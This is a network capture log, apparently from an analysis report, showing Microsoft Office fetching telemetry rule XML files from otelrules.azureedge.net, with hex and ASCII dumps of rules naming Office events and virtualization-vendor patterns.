2024-11-09 01:47:55 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 45 78 63 65 6c 2e 43 6f 61 75 74 68 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Coauth.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.7	49798	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:28 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:28 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:28 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 52d88e03-c01e-007a-7b0b-2db877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014728Z-16547b76f7ftdm8dhC1DFWs13g0000000adg00000000d58n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:28 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.7	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:28 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:28 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 1948a86d-a01e-003d-79ad-3198d7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014728Z-15869dbbcc6vr5dxhC1DFWqn64000000054000000000qm43 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:28 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.7	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:28 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 75885d68-101e-005a-2958-2e882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014728Z-17df447cdb56j5xmhC1DFWn91800000006yg000000002q76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I
2024-11-09 01:47:55 UTC	192	OUT	GET /rules/rule702100v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:55 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:55 GMT Content-Type: text/xml Content-Length: 1371 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE7DDEC0" x-ms-request-id: 62cd4e30-701e-0001-317e-30b110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014755Z-17df447cdb5lrwcchC1DFWphes00000006r000000000hu3s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:55 UTC	1371	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 45 78 63 65 6c 2e 43 6f 61 75 74 68 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 45 78 63 65 6c 43 6f 61 75 74 68 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel.Coauth" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenExcelCoauth" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.7	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:28 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:28 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 00acd572-101e-0065-6358-2e4088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014728Z-17df447cdb5zfhrmhC1DFWh33000000006r0000000009v2y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:28 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"
2024-11-09 01:47:55 UTC	192	OUT	GET /rules/rule700100v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:56 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:55 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE9BA0663" x-ms-request-id: c65f414c-001e-0028-44d2-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014755Z-16547b76f7f7lhvnhC1DFWa2k00000000ac000000000bmzd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:56 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 45 78 63 65 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 45 78 63 65 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Excel" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenExcel" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.7	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:29 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:29 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014729Z-16547b76f7f775p5hC1DFWzdvn0000000agg0000000044sf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:30 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:47:59 UTC	192	OUT	GET /rules/rule701551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:59 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE998C79E" x-ms-request-id: d1c7a0d3-c01e-007a-077c-30b877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014759Z-17df447cdb5lrwcchC1DFWphes00000006xg0000000001pa x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:59 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 6c 69 63 6b 54 6f 52 75 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ClickToRun.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.7	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:29 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:30 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:29 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 9fb36780-e01e-0052-2349-32d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014729Z-17df447cdb5qkskwhC1DFWeeg4000000072000000000arwx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-09 01:47:30 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">
2024-11-09 01:47:59 UTC	192	OUT	GET /rules/rule702400v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:59 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAC69440" x-ms-request-id: 54d215d4-201e-000c-145f-2e79c4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014759Z-17df447cdb5lrwcchC1DFWphes00000006wg000000003d3s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:59 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 34 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 6f 6d 70 6c 69 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 6f 6d 70 6c 69 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702400" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Compliance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCompliance" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.7	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:29 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:29 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 8b11e52e-a01e-000d-655f-2ed1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014729Z-15869dbbcc6lxrkghC1DFWqpdc00000002sg00000000csz7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:30 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">
2024-11-09 01:47:59 UTC	192	OUT	GET /rules/rule703250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:59 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:52 GMT ETag: "0x8DC582BE4B05315" x-ms-request-id: 2a147c75-d01e-0049-6675-2ee7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014759Z-15869dbbcc6j87jfhC1DFWr0yc00000002s00000000038eg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
